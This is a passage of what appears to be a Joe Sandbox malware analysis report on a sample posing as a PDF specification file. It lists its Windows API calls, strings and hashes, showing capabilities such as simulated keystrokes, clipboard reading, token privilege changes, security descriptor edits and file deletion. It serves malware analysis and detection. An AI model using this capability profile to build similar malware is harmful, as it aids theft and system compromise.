                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003AF8DC
                                      • GetWindowLongW.USER32(?,000000F0), ref: 003AF919
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003AF940
                                      • SendMessageW.USER32 ref: 003AF966
                                      • GetKeyState.USER32(00000011), ref: 003AF9F3
                                      • GetKeyState.USER32(00000009), ref: 003AFA00
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003AFA16
                                      • GetKeyState.USER32(00000010), ref: 003AFA20
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003AFA4F
                                      • SendMessageW.USER32 ref: 003AFA72
                                      • SendMessageW.USER32(?,00001030,?,003AE059), ref: 003AFB6F
                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 003AFB85
                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 003AFB96
                                      • SetCapture.USER32(?), ref: 003AFB9F
                                      • ClientToScreen.USER32(?,?), ref: 003AFC03
                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 003AFC0F
                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 003AFC29
                                      • ReleaseCapture.USER32 ref: 003AFC34
                                      • GetCursorPos.USER32(?), ref: 003AFC69
                                      • ScreenToClient.USER32(?,?), ref: 003AFC76
                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 003AFCD8
                                      • SendMessageW.USER32 ref: 003AFD02
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 003AFD41
                                      • SendMessageW.USER32 ref: 003AFD6C
                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 003AFD84
                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 003AFD8F
                                      • GetCursorPos.USER32(?), ref: 003AFDB0
                                      • ScreenToClient.USER32(?,?), ref: 003AFDBD
                                      • GetParent.USER32(?), ref: 003AFDD9
                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 003AFE3F
                                      • SendMessageW.USER32 ref: 003AFE6F
                                      • ClientToScreen.USER32(?,?), ref: 003AFEC5
                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 003AFEF1
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 003AFF19
                                      • SendMessageW.USER32 ref: 003AFF3C
                                      • ClientToScreen.USER32(?,?), ref: 003AFF86
                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 003AFFB6
                                      • GetWindowLongW.USER32(?,000000F0), ref: 003B004B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                      • String ID: @GUI_DRAGID$F
                                      • API String ID: 3780918311-4164748364
                                      • Opcode ID: 47a5629e018a1a254a852d665897c0028f442a72b037f5d84ef07854100d935f
                                      • Instruction ID: 7e48fa315b0cefec426e224899ffbba37cadd92e0af3166b25bdd3c9c9591bb4
                                      • Opcode Fuzzy Hash: 47a5629e018a1a254a852d665897c0028f442a72b037f5d84ef07854100d935f
                                      • Instruction Fuzzy Hash: E632CC74604244AFDB22CFA4C884FAABBA8FF4A354F140A39F695872B1C731EC55CB51
                                      APIs
                                      • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 003AB1CD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: %d/%02d/%02d
                                      • API String ID: 3850602802-328681919
                                      • Opcode ID: e5560f5dfe999fb6f4a7ee08ef2a47aafc80f46afacdce8f1e6aeeae4321f9ad
                                      • Instruction ID: 0676c6f2c52ec27a23e5dd4b82adc61f65f349e0f1ce251bd16dc7c1dda97a8b
                                      • Opcode Fuzzy Hash: e5560f5dfe999fb6f4a7ee08ef2a47aafc80f46afacdce8f1e6aeeae4321f9ad
                                      • Instruction Fuzzy Hash: F512BF71500608AFEB269F64CC49FAEBBB8FF46710F114229F915DB2E1DB709941CB11
                                      APIs
                                      • GetForegroundWindow.USER32(00000000,00000000), ref: 0035EB4A
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003B3AEA
                                      • IsIconic.USER32(000000FF), ref: 003B3AF3
                                      • ShowWindow.USER32(000000FF,00000009), ref: 003B3B00
                                      • SetForegroundWindow.USER32(000000FF), ref: 003B3B0A
                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003B3B20
                                      • GetCurrentThreadId.KERNEL32 ref: 003B3B27
                                      • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 003B3B33
                                      • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 003B3B44
                                      • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 003B3B4C
                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 003B3B54
                                      • SetForegroundWindow.USER32(000000FF), ref: 003B3B57
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 003B3B6C
                                      • keybd_event.USER32(00000012,00000000), ref: 003B3B77
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 003B3B81
                                      • keybd_event.USER32(00000012,00000000), ref: 003B3B86
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 003B3B8F
                                      • keybd_event.USER32(00000012,00000000), ref: 003B3B94
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 003B3B9E
                                      • keybd_event.USER32(00000012,00000000), ref: 003B3BA3
                                      • SetForegroundWindow.USER32(000000FF), ref: 003B3BA6
                                      • AttachThreadInput.USER32(000000FF,?,00000000), ref: 003B3BCD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 4125248594-2988720461
                                      • Opcode ID: f1d6193d5d3c0441805c0b0dd19f4ca616d91dd1951045c02b1997f879af7722
                                      • Instruction ID: 75c41288045e8dae93a67328ab7b9054cdae322fec5a2fd96350fd2e7a3ffe29
                                      • Opcode Fuzzy Hash: f1d6193d5d3c0441805c0b0dd19f4ca616d91dd1951045c02b1997f879af7722
                                      • Instruction Fuzzy Hash: 40318771A403287BEB225F659C49FBF7E6CEB84B54F114025FB05EA1D0D6B16D10EBA0
                                      APIs
                                        • Part of subcall function 0037B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0037B180
                                        • Part of subcall function 0037B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0037B1AD
                                        • Part of subcall function 0037B134: GetLastError.KERNEL32 ref: 0037B1BA
                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0037AD5A
                                      • CloseHandle.KERNEL32(?), ref: 0037AD6B
                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0037AD82
                                      • GetProcessWindowStation.USER32 ref: 0037AD9B
                                      • SetProcessWindowStation.USER32(00000000), ref: 0037ADA5
                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0037ADBF
                                        • Part of subcall function 0037AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0037ACC0), ref: 0037AB99
                                        • Part of subcall function 0037AB84: CloseHandle.KERNEL32(?,?,0037ACC0), ref: 0037ABAB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue
                                      • String ID: $H*?$default$winsta0
                                      • API String ID: 3576815822-2897388558
                                      • Opcode ID: 98c6487df4f8adfdc6f498371cda062ce414527ff82342d364ff0cd1284a60fd
                                      • Instruction ID: 2f81ed0590f76539943918e0a34b078f637e1544a8293ab659d2183c87ced6c1
                                      • Opcode Fuzzy Hash: 98c6487df4f8adfdc6f498371cda062ce414527ff82342d364ff0cd1284a60fd
                                      • Instruction Fuzzy Hash: 9D819E71800209EFDF239FA4CC45EEEBB78EF48344F058129F918A6561D7399E54DB62
                                      APIs
                                      • OpenClipboard.USER32(003DDC00), ref: 00396B36
                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00396B44
                                      • GetClipboardData.USER32(0000000D), ref: 00396B4C
                                      • CloseClipboard.USER32 ref: 00396B58
                                      • GlobalLock.KERNEL32(00000000), ref: 00396B74
                                      • CloseClipboard.USER32 ref: 00396B7E
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00396B93
                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 00396BA0
                                      • GetClipboardData.USER32(00000001), ref: 00396BA8
                                      • GlobalLock.KERNEL32(00000000), ref: 00396BB5
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00396BE9
                                      • CloseClipboard.USER32 ref: 00396CF6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                      • String ID:
                                      • API String ID: 3222323430-0
                                      • Opcode ID: ab5ee39a1c3f711a61c331987ed9ea34d1e00030563166066629c34ca9311b78
                                      • Instruction ID: 06667a683c48bb94a1c55175f898984522ff46fa87ce709e1ba8d4f1a1f81ab5
                                      • Opcode Fuzzy Hash: ab5ee39a1c3f711a61c331987ed9ea34d1e00030563166066629c34ca9311b78
                                      • Instruction Fuzzy Hash: FA51AC31205201ABD703AF65DD96F6E77ACEF84B00F010429F696DA2E1EF70E905CB62
                                      APIs
                                      • LoadLibraryExW.KERNEL32(USER32.DLL,00000000,00000800,?,?,?,?,?,00368364,004002E0,Microsoft Visual C++ Runtime Library,00012010), ref: 0037396E
                                      • GetLastError.KERNEL32(?,?,?,?,?,00368364,004002E0,Microsoft Visual C++ Runtime Library,00012010), ref: 0037397A
                                      • LoadLibraryW.KERNEL32(USER32.DLL,?,?,?,?,?,00368364,004002E0,Microsoft Visual C++ Runtime Library,00012010), ref: 0037398E
                                      • GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 003739A4
                                      • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 003739C0
                                      • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 003739D4
                                      • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 003739E8
                                      • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 00373A00
                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00368364,004002E0,Microsoft Visual C++ Runtime Library,00012010), ref: 00373A11
                                      • OutputDebugStringW.KERNEL32(?,?,?,?,?,?,00368364,004002E0,Microsoft Visual C++ Runtime Library,00012010), ref: 00373A23
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad$DebugDebuggerErrorLastOutputPresentString
                                      • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                      • API String ID: 3193981680-564504941
                                      • Opcode ID: 4d7d7afa5918954f9754d6e2555e689d9289de2b4d2626cb6b7d97608573887b
                                      • Instruction ID: 8319a64cbb6aa361734fee4ff92dc5c7e60326d937140b15f7d00682fd260516
                                      • Opcode Fuzzy Hash: 4d7d7afa5918954f9754d6e2555e689d9289de2b4d2626cb6b7d97608573887b
                                      • Instruction Fuzzy Hash: C051C371A00246EBCB63DFB59D86EAE77A8BF04740B158429F54AF3160DB38DE40DB64
                                      APIs
                                        • Part of subcall function 00386EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00385FA6,?), ref: 00386ED8
                                        • Part of subcall function 00386EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00385FA6,?), ref: 00386EF1
                                        • Part of subcall function 003872CB: GetFileAttributesW.KERNEL32(?,00386019), ref: 003872CC
                                      • FindFirstFileW.KERNEL32(?,?), ref: 003861A4
                                      • lstrcmpiW.KERNEL32(?,?), ref: 0038625D
                                      • DeleteFileW.KERNEL32(?), ref: 0038626E
                                      • MoveFileW.KERNEL32(?,?), ref: 00386289
                                      • MoveFileW.KERNEL32(?,?), ref: 00386298
                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 003862AD
                                      • DeleteFileW.KERNEL32(?), ref: 003862BE
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 003862E1
                                      • FindClose.KERNEL32(00000000), ref: 003862FD
                                      • FindClose.KERNEL32(00000000), ref: 0038630B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: File$Find$CloseDeleteFullMoveNamePath$AttributesCopyFirstNextlstrcmpi
                                      • String ID: \*.*$p1Kw`KLw
                                      • API String ID: 2804892958-1688704836
                                      • Opcode ID: 892f8feb5541cda8dcaafecf56ceab97175285183cb7c6de6a174defa4b08d2b
                                      • Instruction ID: b43a3e75efc78c7ab9368541ace232fa5474c8cc1aa914c931402a74ca30b203
                                      • Opcode Fuzzy Hash: 892f8feb5541cda8dcaafecf56ceab97175285183cb7c6de6a174defa4b08d2b
                                      • Instruction Fuzzy Hash: 7C51227280821C6ACB22FB91DC46DEF77BCAF05300F0945EAE585E7141DE76A7498FA4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: >$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$T.?$UCP)$UTF)$UTF16)$>>> >
                                      • API String ID: 0-711257144
                                      • Opcode ID: 0ed47925fadd9e57dff83c3c504fb9e9537a298f616a2d5320fde6a8d33a4982
                                      • Instruction ID: 65d22b3bfe05532eb623a4eeef9bfbd0f57ed2b5cb6334f4b006f9dc0a0fdb26
                                      • Opcode Fuzzy Hash: 0ed47925fadd9e57dff83c3c504fb9e9537a298f616a2d5320fde6a8d33a4982
                                      • Instruction Fuzzy Hash: 6C728E75E042199BDB26DF59C880BBEB7F5BF08310F15816AE905EB680DB709E41DB90
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?,774A8FB0,?,00000000), ref: 00391B50
                                      • GetFileAttributesW.KERNEL32(?), ref: 00391B8E
                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00391BA8
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00391BC0
                                      • FindClose.KERNEL32(00000000), ref: 00391BCB
                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00391BE7
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00391C37
                                      • SetCurrentDirectoryW.KERNEL32(003F39FC), ref: 00391C55
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00391C5F
                                      • FindClose.KERNEL32(00000000), ref: 00391C6C
                                      • FindClose.KERNEL32(00000000), ref: 00391C7C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                      • String ID: *.*
                                      • API String ID: 1409584000-438819550
                                      • Opcode ID: 3e02f061eba18493177d0a6af5e8b49c96fd8d0d4a6f9378eee7b911718332c4
                                      • Instruction ID: 4553d73e19d503c10d574b26e8584c90484f702f1e56bbdb2301ae52bff8018c
                                      • Opcode Fuzzy Hash: 3e02f061eba18493177d0a6af5e8b49c96fd8d0d4a6f9378eee7b911718332c4
                                      • Instruction Fuzzy Hash: 6F31C23254021A6BDF23EBB4EC49EEE77AC9F05320F1545A6F915E3090EB70EA458F64
                                      APIs
                                        • Part of subcall function 0037ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0037ABD7
                                        • Part of subcall function 0037ABBB: GetLastError.KERNEL32(?,0037A69F,?,?,?), ref: 0037ABE1
                                        • Part of subcall function 0037ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0037A69F,?,?,?), ref: 0037ABF0
                                        • Part of subcall function 0037ABBB: HeapAlloc.KERNEL32(00000000,?,0037A69F,?,?,?), ref: 0037ABF7
                                        • Part of subcall function 0037ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0037AC0E
                                        • Part of subcall function 0037AC56: GetProcessHeap.KERNEL32(00000008,0037A6B5,00000000,00000000,?,0037A6B5,?), ref: 0037AC62
                                        • Part of subcall function 0037AC56: HeapAlloc.KERNEL32(00000000,?,0037A6B5,?), ref: 0037AC69
                                        • Part of subcall function 0037AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0037A6B5,?), ref: 0037AC7A
                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0037A6D0
                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0037A704
                                      • GetLengthSid.ADVAPI32(?), ref: 0037A715
                                      • GetAce.ADVAPI32(?,00000000,?), ref: 0037A752
                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0037A76E
                                      • GetLengthSid.ADVAPI32(?), ref: 0037A78B
                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0037A79A
                                      • HeapAlloc.KERNEL32(00000000), ref: 0037A7A1
                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0037A7C2
                                      • CopySid.ADVAPI32(00000000), ref: 0037A7C9
                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0037A7FA
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0037A820
                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0037A834
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast
                                      • String ID:
                                      • API String ID: 1795222879-0
                                      • Opcode ID: 823baeb521bb0f17bd6d1436cc42f925c8b7ca89a84eb19d87e817d09480e59c
                                      • Instruction ID: f4565c250fee65eb59b4dced8966e516732aa2b738f373c833bd95351dd69d8b
                                      • Opcode Fuzzy Hash: 823baeb521bb0f17bd6d1436cc42f925c8b7ca89a84eb19d87e817d09480e59c
                                      • Instruction Fuzzy Hash: B7513C71900619BBDF169F95DC45EEEBBB9FF44300F048129F915EA290D738AA05CB61
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?,774A8FB0,?,00000000), ref: 00391CAB
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00391D06
                                      • FindClose.KERNEL32(00000000), ref: 00391D11
                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00391D2D
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00391D7D
                                      • SetCurrentDirectoryW.KERNEL32(003F39FC), ref: 00391D9B
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00391DA5
                                      • FindClose.KERNEL32(00000000), ref: 00391DB2
                                      • FindClose.KERNEL32(00000000), ref: 00391DC2
                                        • Part of subcall function 00386BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00386BEF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                      • String ID: *.*
                                      • API String ID: 2640511053-438819550
                                      • Opcode ID: 7ee6044281470cda1de8bf2fa672967b2536fa43cf7f2bf475e7f77f2b442a50
                                      • Instruction ID: 1b7d5a0bf39d7d410613f7bd01548c796c2e29c260efdcf815f922e0c42d9e09
                                      • Opcode Fuzzy Hash: 7ee6044281470cda1de8bf2fa672967b2536fa43cf7f2bf475e7f77f2b442a50
                                      • Instruction Fuzzy Hash: A631FE3250061B6ADF23EBA0EC09EEE77AC9F05324F1545A5F901F61A1DB70EE458B64
                                      APIs
                                        • Part of subcall function 003A3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003A2BB5,?,?), ref: 003A3C1D
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003A328E
                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 003A332D
                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 003A33C5
                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 003A3604
                                      • RegCloseKey.ADVAPI32(00000000), ref: 003A3611
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
